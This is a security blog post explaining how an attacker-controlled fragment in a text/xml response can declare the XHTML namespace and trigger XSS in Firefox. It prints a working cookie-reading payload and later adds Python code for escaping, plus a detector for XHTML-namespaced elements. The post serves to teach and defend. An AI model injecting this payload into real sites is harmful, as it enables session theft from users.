Firefox renders xmlns xhtml in favor of XSS

My colleague John Hernandez showed me this trick the other day, which has proven useful as an exploit in many cases. If the site returns XML with a Content-Type: text/xml you'd normally think there's not much script injection potential. However there most certainly is if an attacker can control just one fragment of the XML.


<?xml version="1.0" encoding="UTF-8" ?>
<root>
<a>
(attacker controlled)
</a>
</root>


If the attacker can control the XML fragment in that part, they could insert something like:


<p xmlns='http://www.w3.org/1999/xhtml'>
<script>
function myfunction()
{
var doc = window.frames["myFrame"].document;
alert(doc.cookie);
}
</script>
<form>
<input type="button" onclick="myfunction()" value="Call function" />
</form>
<iframe src="site domain" id="myFrame" />
</p>


By declaring the XHTML namespace (xmlns="http://www.w3.org/1999/xhtml") on the injected element, some browsers (Firefox only, as far as I know) will treat that fragment as HTML and render it in the security context of the domain hosting the XML. The iframe points back to that same domain, and the script reads the iframe's HTML DOM to reach the cookie and session information, which isn't exposed through the original XML document's DOM.

I believe this is desired functionality in Firefox, but we've found several exploitable issues in popular applications because of it.
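The fix on the server side is to escape the untrusted fragment so it stays text inside <a>, and a response check can confirm no element ever ends up in the XHTML namespace. The following is an added example (not from the original post): a hypothetical builder for the XML response shown above, its escaped counterpart, and a detector that walks the parsed response and reports any XHTML-namespaced elements. The payload is a constructed, minimal version of the one in the post.

```python
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

XHTML_NS = "http://www.w3.org/1999/xhtml"

# Constructed test fragment, modelled on the post's payload (assumption: the
# application interpolates user input straight into the <a> element).
PAYLOAD = "<p xmlns='http://www.w3.org/1999/xhtml'><script>alert(1)</script></p>"


def build_response(fragment: str) -> str:
    """Vulnerable builder: the fragment is dropped into the XML unescaped."""
    return ('<?xml version="1.0" encoding="UTF-8" ?>'
            f'<root><a>{fragment}</a></root>')


def build_response_escaped(fragment: str) -> str:
    """Hardened builder: markup characters are escaped, so the fragment
    becomes text content of <a> and can never introduce a namespace."""
    return build_response(escape(fragment))


def find_xhtml_elements(xml_text: str) -> list[str]:
    """Return the local names of every element in the XHTML namespace,
    in document order. A non-empty list means the response would be
    rendered as HTML by a browser that honours xmlns on XML documents."""
    root = ET.fromstring(xml_text.encode("utf-8"))
    prefix = "{" + XHTML_NS + "}"
    return [el.tag[len(prefix):] for el in root.iter()
            if el.tag.startswith(prefix)]


def fragment_text(xml_text: str) -> str:
    """Text content of <a> after parsing, to show the escaped fragment
    survives as data rather than markup."""
    root = ET.fromstring(xml_text.encode("utf-8"))
    return root.find("a").text or ""


if __name__ == "__main__":
    print("unescaped:", find_xhtml_elements(build_response(PAYLOAD)))
    print("escaped:  ", find_xhtml_elements(build_response_escaped(PAYLOAD)))
    print("as text:  ", fragment_text(build_response_escaped(PAYLOAD)))
```

The detector is useful as a regression test on any endpoint that serves text/xml with user-influenced content; the escaping is the actual mitigation.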